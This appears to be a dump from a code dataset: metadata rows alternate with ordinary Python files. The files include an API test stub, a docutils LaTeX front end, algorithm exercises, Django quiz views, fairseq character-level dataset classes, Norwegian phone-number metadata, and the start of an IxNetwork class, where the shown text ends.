22e0f4ddf70d8a6df31ef25ad3c9523dd8105a3a | ac89e5d51d0d15ffdecfde25985c28a2af9c2e43 | /test/test_match_alliance.py | 931bc1a9d817c762a45d35d742fc1774fbbb67f5 | []
| no_license | TBA-API/tba-api-client-python | 20dc4a634be32926054ffc4c52b94027ee40ac7d | 4f6ded8fb4bf8f7896891a9aa778ce15a2ef720b | refs/heads/master | 2021-07-15T16:36:32.234217 | 2020-05-07T00:20:43 | 2020-05-07T00:20:43 | 134,112,743 | 4 | 8 | null | 2019-07-01T03:14:12 | 2018-05-20T02:13:45 | Python | UTF-8 | Python | false | false | 1,191 | py | # coding: utf-8
"""
The Blue Alliance API v3
# Overview Information and statistics about FIRST Robotics Competition teams and events. # Authentication All endpoints require an Auth Key to be passed in the header `X-TBA-Auth-Key`. If you do not have an auth key yet, you can obtain one from your [Account Page](/account). A `User-Agent` header may need to be set to prevent a 403 Unauthorized error. # noqa: E501
The version of the OpenAPI document: 3.04.1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import tbaapiv3client
from tbaapiv3client.models.match_alliance import MatchAlliance # noqa: E501
from tbaapiv3client.rest import ApiException
class TestMatchAlliance(unittest.TestCase):
"""MatchAlliance unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testMatchAlliance(self):
"""Test MatchAlliance"""
# FIXME: construct object with mandatory attributes with example values
# model = tbaapiv3client.models.match_alliance.MatchAlliance() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
]
| |
8f152a314ef63e887d0f8e569075306ee1396908 | 4ae3b27a1d782ae43bc786c841cafb3ace212d55 | /Test_Slen/Pytest_proj/01/Scripts/rst2latex.py | 61137b0e6f44ef69c8780b8663fadf71a62bbb4b | []
| no_license | bopopescu/Py_projects | c9084efa5aa02fd9ff6ed8ac5c7872fedcf53e32 | a2fe4f198e3ca4026cf2e3e429ac09707d5a19de | refs/heads/master | 2022-09-29T20:50:57.354678 | 2020-04-28T05:23:14 | 2020-04-28T05:23:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 844 | py | #!c:\users\jsun\documents\py_projects\pytest_proj\01\scripts\python.exe
# $Id: rst2latex.py 5905 2009-04-16 12:04:49Z milde $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing LaTeX.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline
description = ('Generates LaTeX documents from standalone reStructuredText '
'sources. '
'Reads from <source> (default is stdin) and writes to '
'<destination> (default is stdout). See '
'<http://docutils.sourceforge.net/docs/user/latex.html> for '
'the full reference.')
publish_cmdline(writer_name='latex', description=description)
| [
"[email protected]"
]
| |
9baf84a3f128fbdc8787947c099b5f83b777bbc7 | 1285703d35b5a37734e40121cd660e9c1a73b076 | /aizu_online_judge/tree/7_d_solution.py | 70efa80577b60594e3d0ffb0dedc8489925e85a8 | []
| no_license | takin6/algorithm-practice | 21826c711f57131108168775f08e4e13d07a3b38 | f4098bea2085a77d11c29e1593b3cc3f579c24aa | refs/heads/master | 2022-11-30T09:40:58.083766 | 2020-08-07T22:07:46 | 2020-08-07T22:07:46 | 283,609,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 985 | py | class Node():
def __init__(self, parent = -1, left = -1, right = -1):
self.parent = parent
self.left = left
self.right = right
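# Walk the reconstructed tree left subtree, right subtree, root, collecting
# 1-based node ids as strings.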
def postorder(ns, i, post):
if ns[i].left != -1:
postorder(ns, ns[i].left, post)
if ns[i].right != -1:
postorder(ns, ns[i].right, post)
post.append(str(i + 1))
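# Rebuild the tree from preorder (po) and inorder (io): po[0] is the root, and
# its position in io splits the remaining ids into the left and right subtrees.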
def poio_node(ns, po, io):
p = po[0]
i = io.index(p)
if i != 0:
ns[p].left = po[1]
ns[po[1]].parent = p
poio_node(ns, po[1:i + 1], io[:i])
if i != len(io) -1:
ns[p].right = po[i + 1]
ns[po[1 + i]].parent = p
poio_node(ns, po[i + 1:], io[i + 1:])
def min1(n):
return n - 1
n = int(input())
po = list(map(int, input().split()))
io = list(map(int, input().split()))
po = list(map(min1, po))
io = list(map(min1, io))
ns = [Node() for i in range(n)]
poio_node(ns, po, io)
post = []
postorder(ns, po[0], post)
print(" ".join(post)) | [
"[email protected]"
]
| |
cd8c39eff00b00f3071855b64494d6159d08584a | 45b64f620e474ac6d6b2c04fbad2730f67a62b8e | /Varsity-Final-Project-by-Django-master/.history/project/quiz/views_20210423112204.py | 7280d320c23c7ccb25ba0eff899768fde6d05502 | []
| no_license | ashimmitra/Final-Project | 99de00b691960e25b1ad05c2c680015a439277e0 | a3e1d3c9d377e7b95b3eaf4dbf757a84a3858003 | refs/heads/master | 2023-04-11T06:12:35.123255 | 2021-04-26T15:41:52 | 2021-04-26T15:41:52 | 361,796,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 974 | py | from django.shortcuts import render
from quiz.models import Quiz
from quiz.models import Bangla
from quiz.models import Math
from quiz.models import Science
from quiz.models import GK
#def welcome(request):
#return render(request, 'welcome.html')
def english(request):
questions = Quiz.objects.all()
return render(request, 'english.html', { 'questions': questions})
def bangla(request):
questions = Bangla.objects.all()
return render(request, 'bangla.html', { 'questions': questions})
def math(request):
questions = Math.objects.all()
return render(request, 'math.html', { 'questions': questions})
def science(request):
questions = Science.objects.all()
return render(request, 'science.html', { 'questions': questions})
def generalknowledge(request):
questions = GK.objects.all()
return render(request, 'generalknowledge.html', { 'questions': questions})
def result(request):
return render(request, 'result.html')
| [
"[email protected]"
]
| |
c0ecc3296cd811fe782785ac56a926a7383d5c13 | 128b3bb5e5e3797ea73b8d71ec479b02d2d02b75 | /py/h2o_nodes.py | 55df64bb6144d92806a795cb08cbf9c422050764 | [
"Apache-2.0"
]
| permissive | JerryZhong/h2o | 14819b044466dffe4ec461cb154898610f6be8b3 | c8ce6d223786673b5baf28f26d653bf4bd9f4ba9 | refs/heads/master | 2021-01-17T10:12:35.547837 | 2014-11-07T11:05:47 | 2014-11-07T11:05:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py |
# does the globally visible update behavior on these depend on them being mutable?
# to get rid of circular imports
# should think of managing this differently
print "h2o_nodes"
nodes = []
# used to get a browser pointing to the last RFview
global json_url_history
json_url_history = []
| [
"[email protected]"
]
| |
ccedc17ba5f223b2b46ee55cbe835f9f835c7af1 | 2cf1f60d5adcc9fe56366e26b95860a440bcb230 | /Previous Year CodeVita/Travel_Cost.py | 3818cb399113612f5e097dfbda7f072ec2e90394 | []
| no_license | rohanJa/DSA_IMP | 619a7b5c89b55cbff3c77b265242c05ebedd6140 | b0ead018814d53a00cc47cda1915ad0dfe5c30dc | refs/heads/master | 2022-12-23T22:56:32.775027 | 2020-09-01T06:52:25 | 2020-09-01T06:52:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | import heapq
N = int(input())
cities = list(map(int, input().split(' ')))
M = int(input())
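# Reading of the task (inferred from the code, not from a problem statement):
# the first and last city costs are always paid, each -1 entry consumes one of
# the M free passes, and of the remaining costs the M largest may be skipped,
# hence the heapq.nlargest subtraction at the end.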
if(len(cities)<=1 or cities[-1]==-1):
print(-1)
else:
cost = cities[0] + cities[-1]
cities = cities[1:len(cities)-1]
heapq.heapify(cities)
for i in range(0,len(cities)):
if(cities[i]==-1):
M-=1
else:
cost+=cities[i]
if(M<0):
print(-1)
else:
print(cost - sum(heapq.nlargest(M,cities)))
| [
"[email protected]"
]
| |
741f4f977054d674b6570a9cbd439392f1bdf378 | c8a0f1ee8ca4b27d6b71e1a358f950a5f168b953 | /Sessão 4/Atributos de classe/Encapsulamento.py | cf204b06b1de3f55ff1b2bc2ec9d5e83d5a6d641 | []
| no_license | natanaelfelix/Estudos | 0c3a54903a5ac457c1c1cfbdc22202683c46b62c | 10b33fa7cb8521d63ea6a14c04894a5f7e86ee0c | refs/heads/master | 2022-12-16T12:07:45.088305 | 2020-09-19T19:56:07 | 2020-09-19T19:56:07 | 296,936,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,553 | py | #esconde codigos em python
'''
public: methods and attributes can be accessed both inside and outside the class
protected: attributes that can be accessed only inside the class or in its child classes
private: the attribute or method is available only inside the class
in Python:
this is done by convention
_  marks it as private-ish, but really works as a weaker kind of protected
__ means private: it should not be used from outside under any circumstances
to access the real private attribute (name mangling):
(instance._ClassName__attribute_name)
#all of this exists to protect the application
'''
class BaseDeDados:
def __init__(self):
        #self.dados = {} # this one is public, reachable from inside and outside the class; if that value is changed from outside, the whole class breaks
        #self.__dados = {} #a leading underscore in the name says it is private by convention, so we should not use it from outside
        self.__dados = {} #with two leading underscores Python does not let you use it directly; assigning to it from outside just creates a different attribute
def inserir_cliente(self, id, nome):
if 'clientes' not in self.__dados:
self.__dados['clientes'] = {id: nome}
else:
self.__dados['clientes'].update({id: nome})
def lista_clientes(self):
for id, nome in self.__dados['clientes'].items():
print(id, nome)
def apaga_cliente(self, id):
del self.__dados['clientes'][id]
bd = BaseDeDados()
bd.inserir_cliente(1, 'Adriano')
bd.inserir_cliente(2, 'Ronaldo')
bd.inserir_cliente(3, 'Priscila')
bd.apaga_cliente(2)
bd.lista_clientes()
print(bd._BaseDeDados__dados) #name mangling: bd.__dados would raise AttributeError here; the "private" dict lives under this mangled name
| [
"[email protected]"
]
| |
597dd8723ef677cd5e0dad4d6aa1daa7d951b79b | 6d4a7f3f069e68a984df61b718e39597370a1131 | /main/getmail | 0b93cfc2d2cab97af7695d7546feb81af95b343b | []
| no_license | nabiuddin6/scripts-1 | d7c32a483c1ed4fcca2df3d68bf29cabf81f69c7 | 7a36fa22cfc369ccc5038332f95779370b12507c | refs/heads/master | 2022-09-01T07:14:31.211758 | 2020-05-30T19:20:02 | 2020-05-30T19:20:02 | 270,788,454 | 1 | 0 | null | 2020-06-08T18:55:19 | 2020-06-08T18:55:18 | null | UTF-8 | Python | false | false | 158 | #!/usr/bin/env python3
from fileinput import input as finput
with open("/tmp/mymail.txt", "w") as f:
for line in finput():
print(line, file=f)
| [
"[email protected]"
]
| ||
e1fc711cbdafa14788ed3999fffb04e0286d794c | 927cd757e5ad55293406ab21da05805f172c06aa | /pytorch_translate/data/char_data.py | 694dcbccfc79dea90938d52c57cafdc25eed2a4a | [
"BSD-3-Clause"
]
| permissive | rohan-varma/translate | 5b0f2a8a645b4bcca9355bdb515773ce89a5bb70 | 56d6e9d53da70104f3ac42f99edb0324af2e2304 | refs/heads/master | 2020-07-05T22:44:30.587754 | 2019-08-14T23:06:40 | 2019-08-14T23:10:19 | 202,805,101 | 0 | 0 | null | 2019-08-16T22:08:43 | 2019-08-16T22:08:42 | null | UTF-8 | Python | false | false | 18,513 | py | #!/usr/bin/env python3
from typing import Any, Dict
import numpy as np
import torch
from fairseq import data, tokenizer
from pytorch_translate import vocab_constants
from pytorch_translate.data.dictionary import TAGS
class InMemoryNumpyWordCharDataset(data.indexed_dataset.IndexedDataset):
"""analogous to fairseq.data.IndexedCachedDataset"""
def __init__(self):
"""Initialize empty dataset"""
self.word_buffer = None
self.word_offsets = None
self.char_buffer = None
self.char_offsets = None
self.sizes = None
def get_tokens(self, i):
"""Get tensor of token indices for example i"""
assert i < self.__len__(), f"index {i} out of range!"
a = self.word_buffer[self.word_offsets[i] : self.word_offsets[i + 1]]
return torch.from_numpy(a)
def get_chars_list(self, i):
"""Get list of tensors of character indices for example i"""
result = []
for word_index in range(self.word_offsets[i], self.word_offsets[i + 1]):
char_indices = self.char_buffer[
self.char_offsets[word_index] : self.char_offsets[word_index + 1]
]
result.append(torch.from_numpy(char_indices))
return result
def __len__(self):
# offsets includes 0 and end indices for each example
return self.word_offsets.size - 1
def __del__(self):
pass
def save(self, path):
assert self.word_buffer is not None
assert self.word_offsets is not None
assert self.char_buffer is not None
assert self.char_offsets is not None
np.savez(
path,
word_buffer=self.word_buffer,
word_offsets=self.word_offsets,
char_buffer=self.char_buffer,
char_offsets=self.char_offsets,
)
def load(self, path):
npz = np.load(path)
if "char_buffer" not in npz or "char_offsets" not in npz:
raise RuntimeError(f"{path} does not appear to be a word-char dataset!")
self.word_buffer = npz["word_buffer"]
self.word_offsets = npz["word_offsets"]
self.sizes = self.word_offsets[1:] - self.word_offsets[:-1]
self.char_buffer = npz["char_buffer"]
self.char_offsets = npz["char_offsets"]
def _sent_to_word_ids(
self, sent, word_dict, reverse_order, prepend_inds, append_inds
):
"""
Extract the word ids for words associated with the input sentence.
"""
words = tokenizer.tokenize_line(sent)
if reverse_order:
words.reverse()
word_inds = [word_dict.index(w) for w in words]
word_inds = prepend_inds + word_inds + append_inds
return words, word_inds
def _word_to_char_ids(self, word, char_dict, embed_bytes):
"""
Extract the char/byte ids for char/bytes associated with the input word.
"""
if embed_bytes:
# The byte_id needs to be incremented by 1 to account for the
# padding id (0) in the embedding table
char_inds = (
[vocab_constants.NUM_BYTE_INDICES + TAGS.index(word) + 1]
if word in TAGS
else [byte_id + 1 for byte_id in word.encode("utf8", "ignore")]
)
else:
chars = [word] if word in TAGS else list(word)
char_inds = [char_dict.index(c) for c in chars]
return char_inds
def parse(
self,
path,
word_dict,
char_dict,
embed_bytes=False,
reverse_order=False,
append_eos=False,
):
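        # Numberize one sentence per line: words via word_dict, and each word's
        # characters (or raw bytes) via char_dict, storing everything in flat
        # buffers indexed by offset arrays.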
word_array_list = []
word_offsets = [0]
char_array_list = []
char_offsets = [0]
sizes = []
prepend_inds = []
append_inds = []
if append_eos:
append_inds.append(word_dict.eos_index)
with open(path, "r") as f:
for line in f:
words, word_inds = self._sent_to_word_ids(
sent=line,
word_dict=word_dict,
reverse_order=reverse_order,
prepend_inds=prepend_inds,
append_inds=append_inds,
)
word_array_list.append(np.array(word_inds, dtype=np.int32))
word_offsets.append(word_offsets[-1] + len(word_inds))
sizes.append(len(word_inds))
for word in words:
char_inds = self._word_to_char_ids(word, char_dict, embed_bytes)
char_array_list.append(np.array(char_inds, dtype=np.int32))
char_offsets.append(char_offsets[-1] + len(char_inds))
if append_eos:
char_inds = [char_dict.eos_index]
char_array_list.append(np.array(char_inds, dtype=np.int32))
char_offsets.append(char_offsets[-1] + len(char_inds))
self.word_buffer = np.concatenate(word_array_list)
self.word_offsets = np.array(word_offsets, dtype=np.int64)
self.char_buffer = np.concatenate(char_array_list)
self.char_offsets = np.array(char_offsets, dtype=np.int64)
self.sizes = np.array(sizes, dtype=np.int32)
del word_array_list, word_offsets, char_array_list, char_offsets, sizes
def parse_multilingual(
self,
corpora,
reverse_order,
append_eos,
embed_bytes,
prepend_language_id,
already_numberized,
):
word_array_list = []
word_offsets = [0]
char_array_list = []
char_offsets = [0]
sizes = []
for corpus_config in corpora:
prepend_inds = []
append_inds = []
if append_eos:
append_inds.append(corpus_config.dict.eos_index)
if corpus_config.dialect_id is not None:
if prepend_language_id:
prepend_inds.append(corpus_config.dialect_id)
else:
append_inds.append(corpus_config.dialect_id)
with open(corpus_config.data_file, "r") as f:
for line in f:
words, word_inds = self._sent_to_word_ids(
sent=line,
word_dict=corpus_config.dict,
reverse_order=reverse_order,
prepend_inds=prepend_inds,
append_inds=append_inds,
)
word_array_list.append(np.array(word_inds, dtype=np.int32))
word_offsets.append(word_offsets[-1] + len(word_inds))
sizes.append(len(word_inds))
for word in words:
char_inds = self._word_to_char_ids(
word=word,
char_dict=corpus_config.char_dict,
embed_bytes=embed_bytes,
)
char_array_list.append(np.array(char_inds, dtype=np.int32))
char_offsets.append(char_offsets[-1] + len(char_inds))
if append_eos:
char_inds = [corpus_config.char_dict.eos_index]
char_array_list.append(np.array(char_inds, dtype=np.int32))
char_offsets.append(char_offsets[-1] + len(char_inds))
self.word_buffer = np.concatenate(word_array_list)
self.word_offsets = np.array(word_offsets, dtype=np.int32)
self.char_buffer = np.concatenate(char_array_list)
self.char_offsets = np.array(char_offsets, dtype=np.int32)
self.sizes = np.array(sizes, dtype=np.int32)
del word_array_list, word_offsets, char_array_list, char_offsets, sizes
@staticmethod
def create_from_file(path):
result = InMemoryNumpyWordCharDataset()
result.load(path)
return result
def subsample(self, indices):
"""
Subsample dataset to include only those items indexed by input
argument indices.
"""
word_array_list = []
word_offsets = [0]
char_array_list = []
char_offsets = [0]
sizes = []
for i in indices:
word_inds = self.word_buffer[
self.word_offsets[i] : self.word_offsets[i + 1]
]
word_array_list.append(word_inds)
word_offsets.append(word_offsets[-1] + len(word_inds))
sizes.append(len(word_inds))
for word_index in range(self.word_offsets[i], self.word_offsets[i + 1]):
char_inds = self.char_buffer[
self.char_offsets[word_index] : self.char_offsets[word_index + 1]
]
char_array_list.append(char_inds)
char_offsets.append(char_offsets[-1] + len(char_inds))
self.word_buffer = np.concatenate(word_array_list)
self.word_offsets = np.array(word_offsets, dtype=np.int32)
self.char_buffer = np.concatenate(char_array_list)
self.char_offsets = np.array(char_offsets, dtype=np.int32)
self.sizes = np.array(sizes, dtype=np.int32)
class LanguagePairSourceCharDataset(data.LanguagePairDataset):
"""
Version of fairseq.data.LanguagePairDataset which represents source
sentences as sequences of words, each represented as a sequence of
characters (with numberized indices for both words and characters).
Right-padded only.
"""
def __init__(
self,
src,
src_sizes,
src_dict,
tgt=None,
tgt_sizes=None,
tgt_dict=None,
weights=None,
):
"""
src : InMemoryNumpyWordCharDataset
tgt : InMemoryNumpyDataset
weights: Optional[IndexedInMemoryDataset]
"""
super().__init__(
src,
src_sizes,
src_dict,
tgt,
tgt_sizes,
tgt_dict,
left_pad_source=False,
left_pad_target=False,
)
self.pad_idx = src_dict.pad()
self.eos_idx = src_dict.eos()
self.weights = weights
def get_src_maybe_with_weights(self, i):
example = {
"id": i,
"source_tokens": self.src.get_tokens(i).long(),
"source_chars_list": self.src.get_chars_list(i),
}
if self.weights:
"""
If weight for example is missing, use last seen weight. Sometimes we
just want to assign a weight to the entire dataset with a single value
but also maintain the IndexedInMemoryDataset convention of weights.
This way, even if we don't care/know about dataset size, we can
assign same weight to all examples.
"""
if len(self.weights) <= i:
example["weight"] = self.weights[-1]
else:
example["weight"] = self.weights[i]
else:
example["weight"] = 1.0
return example
def __getitem__(self, i):
example = self.get_src_maybe_with_weights(i)
if self.tgt:
example["target"] = self.tgt[i].long()
return example
def __len__(self):
"""Length in words"""
return len(self.src)
def collate_source(self, samples) -> Dict[str, Any]:
# sort in order of descending number of words
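        # (descending lengths let downstream packed-sequence ops assume sorted
        # input; everything below is right-padded with pad_idx into a
        # [batch, max_words] token tensor and a
        # [batch, max_words, max_word_length] char tensor)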
samples.sort(key=lambda s: len(s["source_tokens"]), reverse=True)
max_words = len(samples[0]["source_tokens"])
id = torch.LongTensor([s["id"] for s in samples])
src_lengths = torch.LongTensor([len(s["source_tokens"]) for s in samples])
weights = torch.FloatTensor([s["weight"] for s in samples])
word_lengths = torch.LongTensor(len(samples), max_words).fill_(0)
for i, s in enumerate(samples):
word_lengths_array = np.array([len(w) for w in s["source_chars_list"]])
word_lengths[i, : word_lengths_array.size] = torch.LongTensor(
word_lengths_array
)
max_word_length = int(word_lengths.max())
src_tokens = (
samples[0]["source_tokens"].new(len(samples), max_words).fill_(self.pad_idx)
)
for i, s in enumerate(samples):
src_tokens[i, : len(s["source_tokens"])] = s["source_tokens"]
char_inds = (
samples[0]["source_chars_list"][0]
.new(len(samples), max_words, max_word_length)
.long()
.fill_(self.pad_idx)
)
for i, s in enumerate(samples):
chars_list = s["source_chars_list"]
for j, chars in enumerate(chars_list):
char_inds[i, j, : word_lengths[i, j]] = chars
return {
"id": id,
"src_tokens": src_tokens,
"src_lengths": src_lengths,
"char_inds": char_inds,
"word_lengths": word_lengths,
"weights": weights,
}
def collate_targets(self, samples):
def merge(move_eos_to_beginning=False):
return data.data_utils.collate_tokens(
[s["target"] for s in samples],
self.pad_idx,
self.eos_idx,
left_pad=False,
move_eos_to_beginning=move_eos_to_beginning,
)
target = merge(move_eos_to_beginning=False)
prev_output_tokens = merge(move_eos_to_beginning=True)
ntokens = sum(len(s["target"]) for s in samples)
return target, prev_output_tokens, ntokens
def collater(self, samples):
if len(samples) == 0:
return {}
source_data = self.collate_source(samples)
target, prev_output_tokens, ntokens = None, None, None
if self.tgt:
target, prev_output_tokens, ntokens = self.collate_targets(samples)
return {
"id": source_data["id"],
"ntokens": ntokens,
"net_input": {
"src_tokens": source_data["src_tokens"],
"src_lengths": source_data["src_lengths"],
"char_inds": source_data["char_inds"],
"word_lengths": source_data["word_lengths"],
"prev_output_tokens": prev_output_tokens,
},
"target": target,
"weights": source_data["weights"],
}
class LanguagePairCharDataset(LanguagePairSourceCharDataset):
"""
Version of fairseq.data.LanguagePairDataset which represents source
and target sentences as sequences of words, each represented as a
sequence of characters (with numberized indices for both words and
characters).
Right-padded only.
"""
def __init__(
self,
src: InMemoryNumpyWordCharDataset,
src_sizes,
src_dict,
tgt: InMemoryNumpyWordCharDataset = None,
tgt_sizes=None,
tgt_dict=None,
weights=None,
):
super().__init__(src, src_sizes, src_dict, tgt, tgt_sizes, tgt_dict)
def __getitem__(self, i):
example = self.get_src_maybe_with_weights(i)
if self.tgt:
example["target"] = self.tgt.get_tokens(i).long()
example["target_chars_list"] = self.tgt.get_chars_list(i)
return example
def collate_tgt_chars(self, samples) -> Dict[str, Any]:
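        # Right-pad target chars to [batch, max_words, max_word_len]; the
        # prev_tgt_* tensors hold the same content shifted right by one word
        # with EOS prepended, i.e. the teacher-forcing decoder input.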
max_tgt_words = max(len(s["target"]) for s in samples)
tgt_word_lengths = torch.LongTensor(len(samples), max_tgt_words).fill_(0)
for i, s in enumerate(samples):
word_lengths_array = np.array([len(w) for w in s["target_chars_list"]])
tgt_word_lengths[i, : word_lengths_array.size] = torch.LongTensor(
word_lengths_array
)
max_tgt_word_length = int(tgt_word_lengths.max())
tgt_char_inds = (
samples[0]["target_chars_list"][0]
.new(len(samples), max_tgt_words, max_tgt_word_length)
.long()
.fill_(self.pad_idx)
)
prev_tgt_char_inds = (
samples[0]["target_chars_list"][0]
.new(len(samples), max_tgt_words + 1, max_tgt_word_length)
.long()
.fill_(self.pad_idx)
)
eos_tensor = torch.tensor([self.eos_idx])
for i, s in enumerate(samples):
chars_list = s["target_chars_list"]
prev_tgt_char_inds[i, 0, :1] = eos_tensor
for j, chars in enumerate(chars_list):
tgt_char_inds[i, j, : tgt_word_lengths[i, j]] = chars
prev_tgt_char_inds[i, j + 1, : tgt_word_lengths[i, j]] = chars
prev_tgt_word_lengths = torch.cat(
(torch.ones((len(samples), 1), dtype=torch.long), tgt_word_lengths), dim=1
)
return {
"prev_tgt_char_inds": prev_tgt_char_inds,
"tgt_char_inds": tgt_char_inds,
"tgt_word_lengths": tgt_word_lengths,
"prev_tgt_word_lengths": prev_tgt_word_lengths,
}
def collater(self, samples):
if len(samples) == 0:
return {}
source_data = self.collate_source(samples)
target_toks, prev_output_tokens, ntokens = None, None, None
prev_tgt_char_inds, tgt_char_inds, tgt_word_lengths = None, None, None
prev_tgt_word_lengths = None
if self.tgt:
target_toks, prev_output_tokens, ntokens = self.collate_targets(samples)
tgt_char_data = self.collate_tgt_chars(samples)
prev_tgt_char_inds = tgt_char_data["prev_tgt_char_inds"]
tgt_char_inds = tgt_char_data["tgt_char_inds"]
tgt_word_lengths = tgt_char_data["tgt_word_lengths"]
prev_tgt_word_lengths = tgt_char_data["prev_tgt_word_lengths"]
return {
"id": source_data["id"],
"ntokens": ntokens,
"net_input": {
"src_tokens": source_data["src_tokens"],
"src_lengths": source_data["src_lengths"],
"char_inds": source_data["char_inds"],
"word_lengths": source_data["word_lengths"],
"prev_output_tokens": prev_output_tokens,
"prev_output_chars": prev_tgt_char_inds,
"prev_output_word_lengths": prev_tgt_word_lengths,
},
"target": target_toks,
"target_char_inds": tgt_char_inds,
"tgt_word_lengths": tgt_word_lengths,
"weights": source_data["weights"],
}
| [
"[email protected]"
]
| |
29ca22271235f65d4e77228e17670c71e65dcf24 | 6d9fbe6e6a2abfd8455e92f6dba67a5f02d87f41 | /lib/phonenumbers/data/region_NO.py | 209547037b31ee8b2a5a3323313d1cb0da54ac21 | []
| no_license | JamesBrace/InfluenceUWebLaunch | 549d0b48ff3259b139cb891a19cb8b5382ffe2c8 | 332d25940e4b1b45a7a2a8200f77c8413543b199 | refs/heads/master | 2021-09-04T04:08:47.594900 | 2018-01-15T16:49:29 | 2018-01-15T16:49:29 | 80,778,825 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,317 | py | """Auto-generated file, do not edit by hand. NO metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_NO = PhoneMetadata(id='NO', country_code=47, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='0\\d{4}|[2-9]\\d{7}', possible_number_pattern='\\d{5}(?:\\d{3})?', possible_length=(5, 8)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:2[1-4]|3[1-3578]|5[1-35-7]|6[1-4679]|7[0-8])\\d{6}', possible_number_pattern='\\d{8}', example_number='21234567', possible_length=(8,)),
mobile=PhoneNumberDesc(national_number_pattern='(?:4[015-8]|5[89]|87|9\\d)\\d{6}', possible_number_pattern='\\d{8}', example_number='40612345', possible_length=(8,)),
toll_free=PhoneNumberDesc(national_number_pattern='80[01]\\d{5}', possible_number_pattern='\\d{8}', example_number='80012345', possible_length=(8,)),
premium_rate=PhoneNumberDesc(national_number_pattern='82[09]\\d{5}', possible_number_pattern='\\d{8}', example_number='82012345', possible_length=(8,)),
shared_cost=PhoneNumberDesc(national_number_pattern='810(?:0[0-6]|[2-8]\\d)\\d{3}', possible_number_pattern='\\d{8}', example_number='81021234', possible_length=(8,)),
personal_number=PhoneNumberDesc(national_number_pattern='880\\d{5}', possible_number_pattern='\\d{8}', example_number='88012345', possible_length=(8,)),
voip=PhoneNumberDesc(national_number_pattern='85[0-5]\\d{5}', possible_number_pattern='\\d{8}', example_number='85012345', possible_length=(8,)),
pager=PhoneNumberDesc(),
uan=PhoneNumberDesc(national_number_pattern='0\\d{4}|81(?:0(?:0[7-9]|1\\d)|5\\d{2})\\d{3}', possible_number_pattern='\\d{5}(?:\\d{3})?', example_number='01234', possible_length=(5, 8)),
voicemail=PhoneNumberDesc(national_number_pattern='81[23]\\d{5}', possible_number_pattern='\\d{8}', example_number='81212345', possible_length=(8,)),
no_international_dialling=PhoneNumberDesc(),
number_format=[NumberFormat(pattern='([489]\\d{2})(\\d{2})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['[489]']),
NumberFormat(pattern='([235-7]\\d)(\\d{2})(\\d{2})(\\d{2})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['[235-7]'])],
main_country_for_code=True,
leading_zero_possible=True,
mobile_number_portable_region=True)
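# Illustrative usage sketch (this data module is normally loaded indirectly by
# the parent `phonenumbers` package, which is assumed to be installed):
#   import phonenumbers
#   n = phonenumbers.parse("21234567", "NO")
#   phonenumbers.is_valid_number(n)  # True: matches the fixed_line pattern above
#   phonenumbers.format_number(n, phonenumbers.PhoneNumberFormat.E164)  # '+4721234567'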
# ---- File: /ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/spbmnodebasevidrange_81d2c633816492894c7a12f8e3079130.py (repo: ajbalogh/ixnetwork_restpy, license: MIT) ----
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class SpbmNodeBaseVidRange(Base):
"""The SPBM Node Base VLAN ID Range.
The SpbmNodeBaseVidRange class encapsulates a list of spbmNodeBaseVidRange resources that are managed by the user.
A list of resources can be retrieved from the server using the SpbmNodeBaseVidRange.find() method.
The list can be managed by using the SpbmNodeBaseVidRange.add() and SpbmNodeBaseVidRange.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'spbmNodeBaseVidRange'
_SDM_ATT_MAP = {
'BVlanPriority': 'bVlanPriority',
'BVlanTpId': 'bVlanTpId',
'BaseVid': 'baseVid',
'EctAlgorithm': 'ectAlgorithm',
'UseFlag': 'useFlag',
}
def __init__(self, parent):
super(SpbmNodeBaseVidRange, self).__init__(parent)
@property
def SpbmNodeIsIdRange(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.spbmnodeisidrange_a3510ccafe15d43e458301835ca1b3b9.SpbmNodeIsIdRange): An instance of the SpbmNodeIsIdRange class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.spbmnodeisidrange_a3510ccafe15d43e458301835ca1b3b9 import SpbmNodeIsIdRange
return SpbmNodeIsIdRange(self)
@property
def BVlanPriority(self):
"""
